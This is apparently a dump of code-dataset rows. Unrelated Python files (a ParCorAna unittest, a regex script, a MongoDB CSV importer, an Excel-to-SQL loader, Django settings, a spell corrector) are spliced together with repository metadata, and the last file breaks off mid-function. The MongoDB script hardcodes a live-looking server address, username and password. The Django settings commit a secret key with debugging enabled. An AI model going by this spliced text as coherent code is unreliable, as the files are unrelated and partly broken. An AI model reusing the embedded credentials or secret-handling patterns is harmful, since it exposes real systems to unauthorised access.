assert os.path.exists(colorFile), "color file %s doesn't exist" % colorkFile
numServers = 1
# make a random directory for the testing that we will remove when done
destDirBase = AppDataPath(os.path.join("ParCorAna","testingDir")).path()
assert len(destDirBase)>0, "did not find testingDir base dir in the ParCorAna data dir"
# tempDestDir = tempfile.mkdtemp(dir=destDirBase)
tempDestDir = os.path.join(destDirBase, "mytest") # DVD REMOVE
if not os.path.exists(tempDestDir): os.mkdir(tempDestDir)
h5outputBaseName = 'g2calc_cspad2x2_%%s_%s-r%4.4d.h5' % (experiment, run) # has %%s for for testName
testH5outputBaseName = 'test_' + h5outputBaseName
h5outputFile = os.path.join(tempDestDir, h5outputBaseName)
testH5outputFile = os.path.join(tempDestDir, testH5outputBaseName)
removeAllInProgressFromParentDir(h5outputFile)
userClass = '--TESTS-MUST-FILL-THIS-IN--'
testName = '--TESTS-MUST-FILL-THIS-IN--'
numTimes = 100 # test data only has 60 events
delays = [1, 2, 3, 5, 7, 10, 15, 23, 34, 50]
self.formatDict = locals().copy()
self.numEvents = 60 # There are 60 events in the test data.
# these 60 events go from fiducials 33132 -> 33312, they go by 3 *except* that they skip
# fiducial 33300. So as 120hz counter times, these go from 1 to 61 and they skip 57.
# the number of delay counts we'll get will be 60-delay for delays > 4
# and 59-delay for delays <=4.
def expectedDelay(delay):
if delay > 4: return 60 - delay
return 59-delay
self.expectedCounts = [expectedDelay(delay) for delay in delays]
# Here are commands to see this:
# eventCountCmd = 'psana -m PrintEventId %s/e*-r%4.4d*.xtc | grep fiducials | grep -v "fiducials=131071" | wc' % (self.dataDir, self.run)
# evtCountOut, evtCountErr = ptl.cmdTimeOut(eventCountCmd)
# numEventsFromCmd = int(evtCountOut.split()[0])
# self.assertEqual(numEvents, numEventsFromCmd, "ran cmd=%s expected to get %d events, but got %d" % (eventCountCmd, numEvents, numEventsFromCmd))
self.tempDestDir = tempDestDir
self.dataDir = dataDir
self.run = run
self.configFileContent='''
import psana
import numpy as np
import ParCorAna as corAna
system_params = {{}}
system_params['dataset'] = 'exp={experiment}:run={run}:dir={dataDir}'
system_params['src'] = 'DetInfo(XcsEndstation.0:Cspad2x2.0)'
system_params['psanaType'] = psana.CsPad2x2.ElementV1
system_params['ndarrayProducerOutKey'] = 'ndarray'
system_params['ndarrayCalibOutKey'] = 'calibrated'
system_params['psanaOptions'], system_params['outputArrayType'] = \\
corAna.makePsanaOptions(srcString=system_params['src'],
psanaType=system_params['psanaType'],
ndarrayOutKey=system_params['ndarrayProducerOutKey'],
ndarrayCalibOutKey=system_params['ndarrayCalibOutKey'])
system_params['workerStoreDtype']=np.float32
system_params['maskNdarrayCoords'] = '{maskFile}'
system_params['testMaskNdarrayCoords'] = '{testMaskFile}'
system_params['numServers'] = {numServers}
system_params['serverHosts'] = None # None means system selects which hosts to use (default).
system_params['times'] = {numTimes}
system_params['update'] = 0
system_params['delays'] = {delays}
testName = '{testName}'
system_params['h5output'] = '{h5outputFile}' % testName
system_params['testH5output'] = '{testH5outputFile}' % testName
system_params['overwrite'] = True
system_params['verbosity'] = 'INFO'
system_params['numEvents'] = 0
system_params['testNumEvents'] = 0
import ParCorAna.UserG2 as UserG2
system_params['userClass'] = {userClass}
user_params = {{}}
user_params['colorNdarrayCoords'] = '{colorFile}'
user_params['saturatedValue'] = (1<<15)
user_params['LLD'] = 1E-9
user_params['notzero'] = 1E-5
user_params['psmon_plot'] = False
'''
def tearDown(self) :
"""
Method called immediately after the test method has been called and
the result recorded. This is called even if the test method raised
an exception, so the implementation in subclasses may need to be
particularly careful about checking internal state. Any exception raised
by this method will be considered an error rather than a test failure.
This method will only be called if the setUp() succeeds, regardless
of the outcome of the test method.
"""
pass
# shutil.rmtree(self.tempDestDir, ignore_errors=True) DVD REMOVE
def test_FilesSame(self):
'''
check that the input files haven't changed
'''
md5sums={'maskColorDir/xcsi0314-r178_XcsEndstation_0_Cspad2x2_0_color_ndarrCoords.npy': 'dad6ebe25b364eeea4114c036b54ea4c',
'maskColorDir/xcsi0314-r178_XcsEndstation_0_Cspad2x2_0_mask_ndarrCoords.npy': '9b8ade01f93fc087228c15cad9944856',
'maskColorDir/xcsi0314-r178_XcsEndstation_0_Cspad2x2_0_testmask_ndarrCoords.npy': '282715e77fb5e4247a6b0851f3b244ea',
'e524-r0178-s00-c00.xtc': 'b73a43ee4393c8c793d430f951cad021',
'e524-r0178-s01-c00.xtc': 'eee2248370bef1a94202d5d6afd89799',
'e524-r0178-s02-c00.xtc': 'd340d899c5ab36f34b75df419af3b711',
'e524-r0178-s03-c00.xtc': '111d1ab55c6bbb685bea7d5501587e1d',
'e524-r0178-s04-c00.xtc': '18fcbc6eec20d2a94f31750f49dc1bda',
'e524-r0178-s05-c00.xtc': '9d87909f0c613ca6433fc94d0985521d'
}
for fname, prev_md5 in md5sums.iteritems():
fullFname = os.path.join(self.dataDir,fname)
assert os.path.exists(fullFname)
cur_md5 = ptl.get_md5sum(fullFname)
self.assertEqual(cur_md5, prev_md5, msg="md5 has changed for %s. old=%s new=%s" % \
(fullFname, prev_md5, cur_md5))
def writeConfigFile(self, configname):
configFileName = os.path.join(self.tempDestDir, configname)
configFile = file(configFileName, 'w')
configFile.write(unindent(self.configFileContent.format(**self.formatDict)))
configFile.close()
return configFileName
def checkDelays(self, h5fileName, delays, expectedCounts):
h5file = h5py.File(h5fileName,'r')
systemDelays = list(h5file['system/system_params/delays'][:])
userDelays = list(h5file['user/G2_results_at_000060/delays'][:])
self.assertListEqual(delays, systemDelays, msg='delays written to config != system delays')
self.assertListEqual(systemDelays, userDelays, msg="in h5 output file, system and user section do not have same delays")
counts = list(h5file['user/G2_results_at_000060/delay_counts'][:])
self.assertEqual(len(counts), len(expectedCounts))
self.assertListEqual(counts, expectedCounts, msg="delay counts wrong.\nAns=%r\nRes=%r\nDly=%r" % \
(expectedCounts, counts, list(delays)))
def test_G2atEnd(self):
self.formatDict['userClass']='UserG2.G2atEnd'
testName = 'atEnd'
self.formatDict['testName'] = testName
configFileName = self.writeConfigFile('config_G2atEnd.py')
cmd = 'mpiexec -n 4 parCorAnaDriver --test_main -c ' + configFileName
self.assertEqual(0, runCmd(cmd, verbose=True), msg="Error running %s" % cmd)
# check delays
h5outputFile = self.formatDict['h5outputFile'] % testName
self.checkDelays(h5outputFile , self.formatDict['delays'], self.expectedCounts)
cmd = 'parCorAnaDriver --test_alt -c ' + configFileName
self.assertEqual(0, runCmd(cmd, verbose=True), msg="Error running %s" % cmd)
cmd = 'parCorAnaDriver --cmp -c ' + configFileName
self.assertEqual(0, runCmd(cmd, verbose=True), msg="error running %s - files must differ" % cmd)
def test_G2IncrementalAccumulator(self):
self.formatDict['userClass']='UserG2.G2IncrementalAccumulator'
testName = 'incrAccum'
self.formatDict['testName'] = testName
configFileName = self.writeConfigFile('config_G2IncrementalAccumulator.py')
cmd = 'mpiexec -n 4 parCorAnaDriver --test_main -c ' + configFileName
self.assertEqual(0, runCmd(cmd, verbose=True), msg="Error running %s" % cmd)
# check delays
h5outputFile = self.formatDict['h5outputFile'] % testName
self.checkDelays(h5outputFile, self.formatDict['delays'], self.expectedCounts)
cmd = 'parCorAnaDriver --test_alt -c ' + configFileName
self.assertEqual(0, runCmd(cmd, verbose=True), msg="Error running %s" % cmd)
cmd = 'parCorAnaDriver --cmp -c ' + configFileName
self.assertEqual(0, runCmd(cmd, verbose=True), msg="error running %s - files must differ" % cmd)
def test_G2Window(self):
self.formatDict['userClass']='UserG2.G2IncrementalWindowed'
testName = 'windowa'
self.formatDict['testName'] = testName
self.formatDict['numTimes'] = 20 # 60 events, so we will get a smaller window
delays = self.formatDict['delays']
self.assertListEqual(delays,[1,2,3,5,7,10,15,23,34,50])
# --- the twenty fiducials we will have will effectively look like
# 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 -- 18 19 20 21
self.expectedCounts = [ 18, 17, 16, 15, 13, 10, 5, 0, 0, 0]
configFileName = self.writeConfigFile('config_G2windoweda.py')
cmd = 'mpiexec -n 4 parCorAnaDriver --test_main -c ' + configFileName
self.assertEqual(0, runCmd(cmd, verbose=True), msg="Error running %s" % cmd)
# check delays
h5outputFile = self.formatDict['h5outputFile'] % testName
self.checkDelays(h5outputFile, self.formatDict['delays'], self.expectedCounts)
cmd = 'parCorAnaDriver --test_alt -c ' + configFileName
self.assertEqual(0, runCmd(cmd, verbose=True), msg="Error running %s" % cmd)
cmd = 'parCorAnaDriver --cmp -c ' + configFileName
self.assertEqual(0, runCmd(cmd, verbose=True), msg="error running %s - files must differ" % cmd)
# we expect windowed incremental to produce the same result as G2 at end with a small numTimes
self.formatDict['userClass']='UserG2.G2atEnd'
self.formatDict['testName'] = 'windowedb'
configFileName = self.writeConfigFile('config_G2windowedb.py')
cmd = 'mpiexec -n 4 parCorAnaDriver --test_main -c ' + configFileName
self.assertEqual(0, runCmd(cmd, verbose=True), msg="Error running %s" % cmd)
h5A = h5outputFile
h5B = self.formatDict['h5outputFile'] % testName
cmd = 'cmpParCorAnaH5OutputPy %s %s' % (h5A, h5B)
print "running cmd=%s" % cmd
o,e,retcode = ptl.cmdTimeOutWithReturnCode(cmd)
print "stdout=%s\nstderr=%s" % (o,e)
self.assertEqual(0, retcode, msg="comparing windowed to atEnd with numTimes=%d failed" % self.formatDict['numTimes'])
if __name__ == "__main__":
    # run the whole suite verbosely when this file is executed directly
    unittest.main(argv=[sys.argv[0], '-v'])
| [
"davidsch@SLAC.STANFORD.EDU@b967ad99-d558-0410-b138-e0f6c56caec7"
] | davidsch@SLAC.STANFORD.EDU@b967ad99-d558-0410-b138-e0f6c56caec7 |
d224d3604bd4bf178bcc2ccbd591c0f88336a58b | 77d808f47101202db6cec5a9eee6b38c55f73fde | /24. Regular Expressions/04.py | 62ae2b81b1544adb49f3011abd21606be8b3f9cb | [] | no_license | dimDamyanov/Py-Fundamentals | 2ce5591fbfebf8d95c832e3f7109b24e53dd721b | 5ccae5bfa456829d97e8773ee9f5eaa5f5051765 | refs/heads/main | 2023-01-29T22:21:07.788061 | 2020-12-13T08:11:04 | 2020-12-13T08:11:04 | 317,682,227 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 138 | py | import re
data = input()
numbers = [n.group(0) for n in re.finditer(r'(^|(?<=\s))-*\d+(\.\d+)*($|(?=\s))', data)]
print(*numbers, sep=' ') | [
"dim.damianov@gmail.com"
] | dim.damianov@gmail.com |
3261a6b00f09d4b7e14c5f54e246398875eded67 | 653ba1fa7bacf0a30f6dd3512387d7ac24559c0c | /import_artists.py | 26b5f1847c156e295e415fc0788987422ecc916c | [] | no_license | jtngrg1992/artscrape | f985eb7a9c550d8f84edc1484f362c36bbb293ed | ee1b6182f95f4e6f49458ccc808f97fd20e974cd | refs/heads/master | 2021-01-01T05:12:30.446180 | 2016-05-30T16:59:08 | 2016-05-30T16:59:08 | 59,461,276 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 669 | py | import csv
import json
import pymongo
from pymongo import MongoClient
dbclient = pymongo.MongoClient("45.55.232.5:27017")
dbclient.artists.authenticate("artSales", "Jl@B$!@#", mechanism='MONGODB-CR')
print(dbclient)
db=dbclient.artists
data=db.allartists
columns=["artist"]
try:
# with open('safronscrape.csv') as csvfile:
csvfile = open('artist_list.csv', 'r')
reader=csv.DictReader(csvfile, delimiter="^")
i=0;
for row in reader:
print(row)
data.insert(row)
# row=json.dumps(row)
# row=json.load(row)
# print(row)
# row['IMAGE_LINK']="http://jlabs.co/artists/images/noimage.jpg"
# print(data.insert(row.copy) )
except Exception as e:
print(str(e))
| [
"jtngrg1992@hotmail.com"
] | jtngrg1992@hotmail.com |
2ee9389f7c4cbb371e4ba28c7b50747868bdd137 | 26ab0c567ad10573970d03892d85acecc0892f3a | /Load Sql Table.py | 5e2e0edd52a0cc363911d905d43e2333e0d588d9 | [] | no_license | Vijay20796/vijay | 80033cd7d1a68f42a37b65ab888cea4b8655b21f | 3ad04bd1f7bc631bcfc2fc9e6447ba4f3bf8b49a | refs/heads/master | 2020-06-21T02:15:19.845510 | 2019-07-24T18:54:55 | 2019-07-24T18:54:55 | 197,320,598 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,488 | py | # -*- coding: utf-8 -*-
"""
Created on Thu Jun 6 21:02:59 2019
@author: hzhou
"""
##### 1.
import pyodbc
import sqlalchemy
from datetime import datetime, time
from openpyxl import load_workbook
from math import radians, sin, cos, acos

# Load trip rows from Q1.xlsx, derive duration / weekend flag / hour-of-day /
# great-circle distance features, and insert them into dbo.Attribute.
conn = pyodbc.connect('Driver={SQL Server Native Client 11.0};''Server=VTCTZHOU;''Database=mydb;''Trusted_Connection=yes;')
engine=sqlalchemy.create_engine('mssql+pyodbc:///?odbc_connect={}'.format(conn))
cursor = conn.cursor()
cursor.execute('truncate TABLE dbo.Attribute')
i=0
for row in load_workbook('Q1.xlsx').worksheets[0].iter_rows():
    if i!=0:  # skip the header row
        row = [cell.value if cell.value is not None else '' for cell in row]
        # trip duration in whole seconds
        timedelta = datetime.strptime( row[1], '%m/%d/%Y %H:%M')-datetime.strptime( row[0], '%m/%d/%Y %H:%M')
        duration=timedelta.days * 24 * 3600 + timedelta.seconds
        isWeekend = 1 if datetime.strptime( row[0], '%m/%d/%Y %H:%M').weekday()>=5 else 0
        hour_of_day=datetime.strptime( row[0], '%m/%d/%Y %H:%M').hour
        # Spherical-law-of-cosines distance in km.  The sheet presumably
        # stores degrees ('radians' was imported but never applied before),
        # so convert first, and clamp the cosine into [-1, 1] to guard
        # against floating-point rounding pushing acos out of domain.
        lat1, lon1 = radians(row[2]), radians(row[3])
        lat2, lon2 = radians(row[4]), radians(row[5])
        cosang = sin(lat1)*sin(lat2) + cos(lat1)*cos(lat2)*cos(lon1 - lon2)
        dist = 6371.01 * acos(max(-1.0, min(1.0, cosang)))
        cursor.execute("INSERT INTO dbo.Attribute(StartTime,EndTime,Start_Latitude,Start_Longitude,End_Latitude,End_Longitude,duration,is_Weekend,hour_of_the_day,distance) VALUES (?,?,?,?,?,?,?,?,?,?)" , row[0],row[1],row[2],row[3],row[4],row[5],duration,isWeekend,hour_of_day,dist)
    i=i+1
conn.commit()
conn.close()
| [
"noreply@github.com"
] | noreply@github.com |
dee0adedecbf760a83859e241b0d54dcace2d253 | 3ae9846d6d82f1d8cc5820d161ebba864cdaee5e | /simulator/simulateTest/simulatorTestDemo.py | 0d3a4dfdc8d5b6213bcdbafa9125180615780d39 | [] | no_license | rhett-chen/GPNet | 7704e66d5ed880522c92208824d1eaed267bce5a | 322c7a29c9b0bdd755dd7ef87190a2ed4adebdc9 | refs/heads/master | 2023-03-21T19:31:37.376158 | 2021-03-22T06:22:33 | 2021-03-22T06:22:33 | 350,227,822 | 3 | 0 | null | null | null | null | UTF-8 | Python | false | false | 5,413 | py | import os
import numpy as np
import torch
import argparse
import sys
sys.path.append(os.getcwd())
from simulator.simulateTest.AutoGraspShapeCoreUtil import AutoGraspUtil
# Command-line interface for the ShapeNetSem grasp simulation test driver.
# (A dead, commented-out duplicate of this parser definition was removed.)
parser = argparse.ArgumentParser(description='ShapeNetSem Grasp testing')
parser.add_argument('-t', '--testFile', default='simulator/gpnet_data/prediction/nms_poses_view0.txt', type=str,
                    metavar='FILE', help='testFile path')
parser.add_argument('-p', '--processNum', default=1, type=int, metavar='N', help='process num using')
parser.add_argument('-w', "--width", action="store_true", dest="width", default=False,
                    help="turn on this param if test file contains width.")
parser.add_argument('--gripperFile', default='simulator/gpnet_data/gripper/parallel_simple.urdf', type=str,
                    metavar='FILE', help='gripper file')
parser.add_argument('--objMeshRoot', default='simulator/gpnet_data/urdf', type=str, metavar='PATH',
                    help='obj mesh path')
def getObjStatusAndAnnotation(testFile, haveWidth=False):
    """Parse a grasp-prediction text file into per-object pose arrays.

    The file alternates object-id header lines (anything without a comma)
    with comma-separated grasp lines.  With haveWidth=True each grasp line
    has 8 fields (width, position xyz, quaternion); otherwise the 7 fields
    start directly at the position.

    Returns:
        quaternionDict: objId -> (N, 4) float array of quaternions
        centerDict:     objId -> (N, 3) float array of grasp centers
        objIdList:      object ids in file order
    """
    with open(testFile, 'r') as testData:
        lines = testData.readlines()
    objIdList = []
    quaternionDict = {}
    centerDict = {}
    objId = 'invalid'
    for line in lines:
        msg = line.strip()
        if len(msg.split(',')) < 2:
            # header line: starts a new object section
            objId = msg.strip()
            objIdList.append(objId)
            # np.float was deprecated and removed in modern NumPy; the
            # builtin float yields the same float64 dtype
            quaternionDict[objId] = np.empty(shape=(0, 4), dtype=float)
            centerDict[objId] = np.empty(shape=(0, 3), dtype=float)
        else:
            # skip annotation lines that appear before any object header
            if objId == 'invalid':
                continue
            pose = msg.split(',')
            if haveWidth:
                # clamp the gripper width to the physical maximum
                length = float(pose[0]) * 0.085  # arbitrary value, will not be used in AutoGrasp
                length = length if length < 0.085 else 0.085
                position = np.array([float(pose[1]), float(pose[2]), float(pose[3])])
                quaternion = np.array([float(pose[4]), float(pose[5]), float(pose[6]), float(pose[7])])
            else:
                position = np.array([float(pose[0]), float(pose[1]), float(pose[2])])
                quaternion = np.array([float(pose[3]), float(pose[4]), float(pose[5]), float(pose[6])])
            quaternionDict[objId] = np.concatenate((quaternionDict[objId], quaternion[None, :]), axis=0)
            centerDict[objId] = np.concatenate((centerDict[objId], position[None, :]), axis=0)
    return quaternionDict, centerDict, objIdList
if __name__ == "__main__":
    cfg = parser.parse_args()
    objMeshRoot = cfg.objMeshRoot
    processNum = cfg.processNum
    gripperFile = cfg.gripperFile
    haveWidth = cfg.width
    testInfoFile = cfg.testFile
    # the simulation log lives next to the prediction file, same stem
    logFile = cfg.testFile[:-4] + '_log.csv'
    print(os.getcwd())
    # truncate any previous log before the parallel runs append to it
    open(logFile, 'w').close()
    simulator = AutoGraspUtil()
    quaternionDict, centerDict, objIdList = getObjStatusAndAnnotation(testInfoFile, haveWidth)
    # register every object's grasp poses with the simulator
    for objId in objIdList:
        q = quaternionDict[objId]
        c = centerDict[objId]
        simulator.addObject2(
            objId=objId,
            quaternion=q,
            translation=c
        )
    simulator.parallelSimulation(
        logFile=logFile,
        objMeshRoot=objMeshRoot,
        processNum=processNum,
        gripperFile=gripperFile,
    )
    annotationSuccessDict = simulator.getSuccessData(logFile=logFile)
    # print(top 10% 30% 50% 100%)
    top10, top30, top50, top100 = simulator.getStatistic(annotationSuccessDict)
    print('top10:\t', top10, '\ntop30:\t', top30, '\ntop50:\t', top50, '\ntop100:\t', top100)
"rhettchen6@outlook.com"
] | rhettchen6@outlook.com |
3fe648ab8a236b2ab1345962cb2d07556e4ac8eb | 7d25815930c03021e37ee003d91fc3116f03ba7f | /new_project/settings.py | 2ae186dfb3048efe35c6e4649f84c008365dd176 | [] | no_license | Tanniru-yashwanth/boards | 771ca023efd9c5d7989181bd6acdba253b3832f5 | 05d64c0c545b55bcf905e2f9e71d843d77645aa5 | refs/heads/master | 2023-07-16T23:33:05.292633 | 2021-08-31T16:14:28 | 2021-08-31T16:14:28 | 401,649,262 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,771 | py | """
Django settings for new_project project.
Generated by 'django-admin startproject' using Django 3.2.6.
For more information on this file, see
https://docs.djangoproject.com/en/3.2/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/3.2/ref/settings/
"""
import os
from pathlib import Path

import django_heroku

# Build paths inside the project like this: BASE_DIR / 'subdir'.
BASE_DIR = Path(__file__).resolve().parent.parent

# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/3.2/howto/deployment/checklist/

# SECURITY WARNING: keep the secret key used in production secret!
# NOTE(review): this key is committed to source control; move it to an
# environment variable before any production deployment.
SECRET_KEY = 'django-insecure-d@j(k7_%k-w4xh-n65hp7k=1cn3!gog4t!g%6qgw*uvuf&(f9w'

# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True

# Empty is acceptable while DEBUG is True; production needs explicit hosts.
ALLOWED_HOSTS = []

# Application definition
INSTALLED_APPS = [
    'django.contrib.admin',
    'django.contrib.auth',
    'django.contrib.contenttypes',
    'django.contrib.sessions',
    'django.contrib.messages',
    'django.contrib.staticfiles',
    'django.contrib.humanize',
    'widget_tweaks',
    'boards',
    'accounts',
]
MIDDLEWARE = [
    'django.middleware.security.SecurityMiddleware',
    'django.contrib.sessions.middleware.SessionMiddleware',
    'django.middleware.common.CommonMiddleware',
    'django.middleware.csrf.CsrfViewMiddleware',
    'django.contrib.auth.middleware.AuthenticationMiddleware',
    'django.contrib.messages.middleware.MessageMiddleware',
    'django.middleware.clickjacking.XFrameOptionsMiddleware',
]
ROOT_URLCONF = 'new_project.urls'
TEMPLATES = [
    {
        'BACKEND': 'django.template.backends.django.DjangoTemplates',
        # Project-level templates live in <repo>/templates.
        'DIRS': [
            os.path.join(BASE_DIR, 'templates')
        ],
        'APP_DIRS': True,
        'OPTIONS': {
            'context_processors': [
                'django.template.context_processors.debug',
                'django.template.context_processors.request',
                'django.contrib.auth.context_processors.auth',
                'django.contrib.messages.context_processors.messages',
            ],
        },
    },
]
WSGI_APPLICATION = 'new_project.wsgi.application'

# Database
# https://docs.djangoproject.com/en/3.2/ref/settings/#databases
# NOTE(review): SQLite default; django_heroku.settings() at the bottom may
# override parts of this configuration when running on Heroku.
DATABASES = {
    'default': {
        'ENGINE': 'django.db.backends.sqlite3',
        'NAME': BASE_DIR / 'db.sqlite3',
    }
}

# Password validation
# https://docs.djangoproject.com/en/3.2/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
    {
        'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
    },
    {
        'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
    },
    {
        'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
    },
    {
        'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
    },
]

# Internationalization
# https://docs.djangoproject.com/en/3.2/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'UTC'
USE_I18N = True
USE_L10N = True
USE_TZ = True

# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/3.2/howto/static-files/
STATIC_URL = '/static/'
STATICFILES_DIRS = [
    os.path.join(BASE_DIR, 'static'),
]

# Default primary key field type
# https://docs.djangoproject.com/en/3.2/ref/settings/#default-auto-field
DEFAULT_AUTO_FIELD = 'django.db.models.BigAutoField'

"""setting logout redirection to home"""
LOGOUT_REDIRECT_URL = 'home'
"""setting login to home"""
LOGIN_REDIRECT_URL = 'home'
"""To configure the email backend"""
EMAIL_BACKEND = 'django.core.mail.backends.console.EmailBackend'
LOGIN_URL = 'login'
# Apply django-heroku's settings patches (database, static files, logging).
django_heroku.settings(locals())
| [
"tanniruyashwanth07@gmail.com"
] | tanniruyashwanth07@gmail.com |
2d543325ab4a419742851d38c1248b80764d2281 | dccc2fd7d5ed88d2c85f551f0a6543d55d465b16 | /test.py | abf1ecc61cd2265c7e07b49d3dde3551cfacf5a4 | [] | no_license | wardaharshad/Emotion-Detection | 5375622be625f21f357fd552a51a1353586acac7 | 2bc55ed6e852b6a8d3acb6d77e424edfe27aa4a8 | refs/heads/main | 2023-06-24T04:57:27.883809 | 2021-07-11T16:35:00 | 2021-07-11T16:35:00 | 384,992,464 | 4 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,738 | py | '''
Emotion Detection Using AI
'''
#USAGE : python test.py
from keras.models import load_model
from time import sleep
from keras.preprocessing.image import img_to_array
from keras.preprocessing import image
import cv2
import numpy as np
# Haar cascade for face detection and the pretrained emotion classifier.
face_classifier = cv2.CascadeClassifier('./haarcascade_frontalface_default.xml')
classifier =load_model('./Emotion_Detection.h5')
# Index order must match the model's output layer.
class_labels = ['Angry','Happy','Neutral','Sad','Surprise']
cap = cv2.VideoCapture(0)  # default webcam
while True:
    # Grab a single frame of video
    ret, frame = cap.read()
    labels = []
    gray = cv2.cvtColor(frame,cv2.COLOR_BGR2GRAY)
    faces = face_classifier.detectMultiScale(gray,1.3,5)
    for (x,y,w,h) in faces:
        cv2.rectangle(frame,(x,y),(x+w,y+h),(255,0,0),2)
        # Crop the face region and resize to the 48x48 input the model expects.
        roi_gray = gray[y:y+h,x:x+w]
        roi_gray = cv2.resize(roi_gray,(48,48),interpolation=cv2.INTER_AREA)
        if np.sum([roi_gray])!=0:
            # Normalise to [0, 1] and add a batch dimension.
            roi = roi_gray.astype('float')/255.0
            roi = img_to_array(roi)
            roi = np.expand_dims(roi,axis=0)
            # make a prediction on the ROI, then lookup the class
            preds = classifier.predict(roi)[0]
            print("\nprediction = ",preds)
            label=class_labels[preds.argmax()]
            print("\nprediction max = ",preds.argmax())
            print("\nlabel = ",label)
            label_position = (x,y)
            cv2.putText(frame,label,label_position,cv2.FONT_HERSHEY_SIMPLEX,2,(0,255,0),3)
        else:
            # All-black crop: nothing meaningful to classify.
            cv2.putText(frame,'No Face Found',(20,60),cv2.FONT_HERSHEY_SIMPLEX,2,(0,255,0),3)
        print("\n\n")
    cv2.imshow('Emotion Detector',frame)
    # Quit on 'q'.
    if cv2.waitKey(1) & 0xFF == ord('q'):
        break
cap.release()
cv2.destroyAllWindows()
| [
"noreply@github.com"
] | noreply@github.com |
413ea73f3d48081fa92bd302cc85004ec2d6250b | 1604b9a7f00b1f71f947d5ed6246ae06f16dd311 | /LanguageModels/SpellCorrect.py | eac890bb467c73e5af94fbc9b6deec1900d548bc | [] | no_license | sezhiyanhari/Natural-Language | 0cd1c086908c19f6ccc435547e1f027977ebc441 | d56c6ba80683df0d909c2e4e1aab943f11b7dd2c | refs/heads/master | 2021-09-20T19:54:41.784198 | 2018-08-14T22:18:15 | 2018-08-14T22:18:15 | 119,505,147 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 4,714 | py | ##
# Credit Zhou Yu, Dan Jurafsky, Peter Norvig
# Updated Kevin Jesse
# Open source code under MIT license
##
import math
from Datum import Datum
from Sentence import Sentence
from Corpus import Corpus
from UniformModel import UniformModel
from UnigramModel import UnigramModel
from BackoffModel import BackoffModel
from SmoothUnigramModel import SmoothUnigramModel
from SmoothBigramModel import SmoothBigramModel
from CustomModel import CustomModel
from EditModel import EditModel
from SpellingResult import SpellingResult
import types
import re, collections
class SpellCorrect:
    """Spelling corrector for sentences.

    Holds the edit model, the language model and the training corpus, and
    corrects sentences under a noisy-channel model (edit probability times
    language-model probability, both in log space).
    """
    def __init__(self, lm, corpus):
        self.languageModel = lm
        self.editModel = EditModel('data/count_1edit.txt', corpus)
    def correctSentence(self, sentence):
        """Assuming exactly one error per sentence, returns the most probable
        corrected sentence.  `sentence` is a list of words bracketed by the
        <s> and </s> markers."""
        if len(sentence) == 0:
            return []
        bestSentence = sentence[:] #copy of sentence
        bestScore = float('-inf')
        for i in xrange(1, len(sentence) - 1): #ignore <s> and </s>
            # TODO: select the maximum probability sentence here, according to the noisy channel model.
            # Tip: self.editModel.editProbabilities(word) gives edits and log-probabilities according to your edit model.
            # You should iterate through these values instead of enumerating all edits.
            # Tip: self.languageModel.score(trialSentence) gives log-probability of a sentence
            originalWord = sentence[i]
            editProbabilities = self.editModel.editProbabilities(originalWord)
            # print(editProbabilities)
            for word, mass in editProbabilities:
                # Noisy channel score: log P(edit) + log P(sentence) under the LM.
                # The word is substituted in place, scored, then restored below.
                sentence[i] = word
                newScore = mass + self.languageModel.score(sentence)
                if(newScore > bestScore):
                    bestScore = newScore
                    bestSentence = sentence[:]
            sentence[i] = originalWord
        return bestSentence
    def evaluate(self, corpus):
        """Tests this speller on a corpus, returns a SpellingResult"""
        numCorrect = 0
        numTotal = 0
        testData = corpus.generateTestCases()
        for sentence in testData:
            if sentence.isEmpty():
                continue
            errorSentence = sentence.getErrorSentence()
            hypothesis = self.correctSentence(errorSentence)
            if sentence.isCorrection(hypothesis):
                numCorrect += 1
            numTotal += 1
        return SpellingResult(numCorrect, numTotal)
    def correctCorpus(self, corpus):
        """Corrects a whole corpus, returns a JSON representation of the output."""
        string_list = [] # we will join these with commas, bookended with []
        sentences = corpus.corpus
        for sentence in sentences:
            uncorrected = sentence.getErrorSentence()
            corrected = self.correctSentence(uncorrected)
            # Hand-rolled JSON: each sentence becomes ["w1","w2",...].
            word_list = '["%s"]' % '","'.join(corrected)
            string_list.append(word_list)
        output = '[%s]' % ','.join(string_list)
        return output
def main():
"""Trains all of the language models and tests them on the dev data. Change devPath if you
wish to do things like test on the training data."""
trainPath = 'data/tagged-train.dat'
trainingCorpus = Corpus(trainPath)
devPath = 'data/tagged-dev.dat'
devCorpus = Corpus(devPath)
print 'Unigram Language Model: '
unigramLM = UnigramModel(trainingCorpus)
unigramSpell = SpellCorrect(unigramLM, trainingCorpus)
unigramOutcome = unigramSpell.evaluate(devCorpus)
print str(unigramOutcome)
print 'Uniform Language Model: '
uniformLM = UniformModel(trainingCorpus)
uniformSpell = SpellCorrect(uniformLM, trainingCorpus)
uniformOutcome = uniformSpell.evaluate(devCorpus)
print str(uniformOutcome)
print 'Smooth Unigram Language Model: '
smoothUnigramLM = SmoothUnigramModel(trainingCorpus)
smoothUnigramSpell = SpellCorrect(smoothUnigramLM, trainingCorpus)
smoothUnigramOutcome = smoothUnigramSpell.evaluate(devCorpus)
print str(smoothUnigramOutcome)
print 'Smooth Bigram Language Model: '
smoothBigramLM = SmoothBigramModel(trainingCorpus)
smoothBigramSpell = SpellCorrect(smoothBigramLM, trainingCorpus)
smoothBigramOutcome = smoothBigramSpell.evaluate(devCorpus)
print str(smoothBigramOutcome)
print 'Backoff Language Model: '
backoffLM = BackoffModel(trainingCorpus)
backoffSpell = SpellCorrect(backoffLM, trainingCorpus)
backoffOutcome = backoffSpell.evaluate(devCorpus)
print str(backoffOutcome)
print 'Custom Language Model: '
